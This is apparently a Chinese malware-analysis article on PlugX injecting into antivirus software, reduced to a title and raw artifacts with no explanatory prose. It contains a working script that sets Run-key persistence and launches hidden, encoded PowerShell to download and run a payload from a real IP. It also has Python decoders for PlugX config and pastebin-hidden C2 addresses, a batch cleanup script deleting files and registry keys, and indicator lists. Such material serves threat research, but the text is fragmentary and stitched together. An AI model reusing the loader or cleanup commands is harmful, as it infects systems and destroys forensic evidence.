本文讲的是
屡禁不止:一个敢于将自己注入到杀毒软件中的斗士,
<script> a=new ActiveXObject("WScript.Shell"); a.run('%windir%System32reg.exe add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /v MSASCuiL2 /t reg_sz /d "%windir%System32msiexec.exe /q /i hxxp://172.104.65.97/Tasks.png" /f', 0);window.close(); a.run('%windir%SysWOW64WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);window.close(); </script>
---- BEGIN SSH2 PUBLIC KEY ---- Comment: "rsa-key" AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd 8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3 /KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps 8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE 2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ= ---- END SSH2 PUBLIC KEY ----
---- BEGIN SSH2 PUBLIC KEY ---- Comment: "rsa-key" AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd 8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3 /KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps 8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE 2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ= ---- END SSH2 PUBLIC KEY ----
import ctypes
from ctypes import *

# Inflate the LZNT1-compressed PlugX settings blob through the native
# RtlDecompressBuffer routine. Windows only: it goes through ctypes.windll.
with open('mysettings.bin','rb') as f:
    buffer = f.read()

# The blob carries no plaintext-size header, so reserve a generous multiple
# of the compressed length and trim to the size the API reports afterwards.
capacity = len(buffer) * 16
uncompressed = create_string_buffer(capacity)
final_size = c_ulong(0)
ntdll = ctypes.windll.ntdll
# COMPRESSION_FORMAT_LZNT1 = 2
status = ntdll.RtlDecompressBuffer(
    2, uncompressed, capacity, buffer, len(buffer), byref(final_size)
)
# NTSTATUS 0 is success; on any other status the ctypes buffer is left as
# allocated (no trimming), exactly as before.
if not status:
    uncompressed = uncompressed[0:final_size.value]
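def plugx_decode(data):
    """Decode a PlugX-encoded blob with the sample's rolling two-key XOR.

    The first four bytes (little-endian uint32) seed two running keys; every
    following byte is XORed with a mask derived from both keys, which are
    advanced by fixed constants before each byte.

    Args:
        data: the encoded payload, as ``bytes``/``bytearray`` or as a
            byte-per-character ``str`` (the Python 2 calling convention);
            at least 4 bytes long.

    Returns:
        The decoded payload as a ``str`` with one character per byte
        (code points 0-255), matching the original ``chr``-built output.

    Raises:
        struct.error: if ``data`` is shorter than the 4-byte key.

    Note:
        ``struct`` is expected to be imported at module level.
    """
    if not isinstance(data, (bytes, bytearray)):
        # Python 3 callers may still hand over a text string; map it 1:1.
        data = data.encode('latin-1')
    decode_key = struct.unpack_from('<I', data, 0)[0]
    # XOR values might possibly be varied between samples.
    key1 = decode_key ^ 20141118
    key2 = decode_key ^ 8389
    out = []
    # bytearray() yields ints on both Python 2 and 3, so no ord() is needed.
    for c in bytearray(data[4:]):
        # ADD/SUB values might possibly be varied between samples.
        key1 += 3373
        key2 -= 39779
        # The mask is the original one-line expression unrolled by operator
        # precedence ('-' before '>>', '&' before '^'); each step is masked
        # to 8 bits, so the unbounded Python ints behave like the 32-bit
        # counters of the native implementation.
        k1_mix = ((key1 >> 16) & 0xff) ^ ((key1 - (key1 >> 8)) & 0xff)
        k1_byte = (k1_mix - (key1 >> 24)) & 0xff
        k2_low = (key2 & 0xff) ^ k1_byte
        k2_mid = (k2_low - (key2 >> 8)) & 0xff
        k2_high = ((key2 >> 16) & 0xff) ^ k2_mid
        mask = (k2_high - (key2 >> 24)) & 0xff
        out.append(chr(c ^ mask))
    # Join once instead of quadratic string concatenation.
    return ''.join(out)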
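import struct


def decode(buf):
    """Undo the PlugX pastebin text encoding.

    Every two input characters encode one output byte: the second character
    of the pair carries the high nibble and the first the low nibble, each
    as an offset from 'A' (0x41). A trailing unpaired character is ignored,
    as in the original loop bound.

    Args:
        buf: the encoded text (a ``str`` of characters in 'A'..'P').

    Returns:
        The decoded bytes (``str`` on Python 2, ``bytes`` on Python 3).

    Raises:
        ValueError: if a pair decodes outside 0..255 (characters outside
            'A'..'P'), as ``chr`` did in the original.
    """
    out = bytearray()
    for low_ch, high_ch in zip(buf[0::2], buf[1::2]):
        high = ord(high_ch) - 0x41
        low = ord(low_ch) - 0x41
        out.append(high * 0x10 + low)
    return bytes(out)


def decode_plugx_pastebin(buf):
    """Extract and print the C2 endpoint hidden in a PlugX pastebin blob.

    The payload sits between the 'DZKS' and 'DZJS' markers and, once
    decoded, lays out a little-endian uint16 connection type, a
    little-endian uint16 port, and the address text.

    Args:
        buf: the full pastebin text.

    Returns:
        True after printing the decoded endpoint, or None if either marker
        is missing or the decoded payload is too short to hold the header.
    """
    start = buf.find('DZKS')
    if start == -1:
        return None
    end = buf.find('DZJS', start + 4)
    if end == -1:
        return None
    decoded = decode(buf[start + 4:end])
    # Both uint16 fields must be present before unpacking.
    if len(decoded) < 4:
        return None
    connection_type = struct.unpack_from('<H', decoded, 0)[0]
    port = struct.unpack_from('<H', decoded, 2)[0]
    ip = decoded[4:]
    if not isinstance(ip, str):
        # Python 3: render the address bytes as text for the message.
        ip = ip.decode('latin-1')
    print("Decoded IP: {}:{}, type: {}".format(ip, port, connection_type))
    return True


decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSGAAALLBAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2q9n8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3J=')
decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSDAAAAFAAEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsAHyLye8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6aBha3q9niJFu2=')
decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlZrrn5UC9=DZKSEAAABGHBEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+PsFu2niJ8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9=')
decode_plugx_pastebin('AAAAB3NzaC1yc2EAAAABJQAAAQEAhLxZe4Qli9xt/WknQK9CDLWubpgknZ0HIHSd8uV/TJvLsRkjpV+U/tMiMxjDwLAHVtNcww2h8bXTtw387M2Iv/mJjQ9Lv3BdNiM3/KvmlpeJZrrFu2n5UC9=DZKSDAAADOECEDFDOCCDEDIDOCIDEDOCHDDZJS=oT+Ps8wD4f0NBUtDdEdXhWp3nxv/mJjQ9Lv3BCFDBd09UZzLrfBO1S0nxrHsxlJ+bPaJE2Q/oxLXTrpeJ6AHyLyeUaBha3q9niJ=')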
mscorsvw.exe cscript del.vbs del BlackBox.dll del mscorsvw.exe del BlackBox del explorer.exe cscript del.vbs del %sfxcmd% del mscorsvw.exe del BlackBox.dll del BlackBox del explorer.exe del del.vbs del a.bat del %sfxcmd% del mscorsvw.exe del BlackBox.dll del BlackBox del explorer.exe del del.vbs del a.bat reg delete "HKLMSYSTEMControlSet001servicesemproxy" /f reg delete "HKLMSYSTEMControlSet002servicesemproxy" /f reg delete "HKLMSYSTEMCurrentControlSetservicesemproxy" /f reg delete "HKLMSYSTEMControlSet001servicesEmpPrx" /f reg delete "HKLMSYSTEMControlSet002servicesEmpPrx" /f reg delete "HKLMSYSTEMCurrentControlSetservicesEmpPrx" /f reg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASAPI32" /f reg delete "HKLMSOFTWAREWow6432NodeMicrosoftTracingsvchost_RASMANCS" /f reg delete "HKU.DEFAULTSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-18SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" 
/f reg delete "HKUS-1-5-18SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-19SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-19SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-20SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete 
"HKUS-1-5-20SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-20SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete 
"HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643SoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script Host" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindows Script HostSettings" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFX" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqffipubfgfipubfg.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}pzq.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareWinRAR SFXC%%Users%ADMINI~1%AppData%Local%Temp" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountHRZR_PGYFRFFVBA" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}Count{S38OS404-1Q43-42S2-9305-67QR0O28SP23}rkcybere.rkr" /f reg delete 
"HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}CountP:HfrefNqzvavfgengbeQbjaybnqfErtfubgCbegnoyrNccertfubgertfubg_k64.rkr" /f reg delete "HKUS-1-5-21-590835768-3595378272-1660587800-1643_ClassesSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnectionsSavedLegacySettings" /f del /s c:windowstemp*.bat del /s c:windowstemp*.dat del /s c:windowstemp*.dll del /s c:windowstemp*.exe del /s c:windowstemp*.vbs del %0
https//pastebin.com/eSsjmhBG https://pastebin.com/PSxQd6qw https://pastebin.com/CzjM9qwi https://pastebin.com/xHDSxxMD %ProgramData%arm2sv1k DSSM DSSM Microsoft Office Document Update Utility SoftwareMicrosoftWindowsCurrentVersionRun JmLI %ProgramFiles(x86)%SophosAutoUpdateALUpdate.exe %ProgramFiles(x86)%Common FilesJavaJava Updatejusched.exe %ProgramFiles(x86)%Common FilesAdobeARM1.0armsvc.exe %windir%system32FlashPlayerApp.exe slax pastebin mahTszuBzqwUTcGt %ProgramData%arm2sv1kAkgcl
原文发布时间为:2017年7月3日
本文作者:xiaohui
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。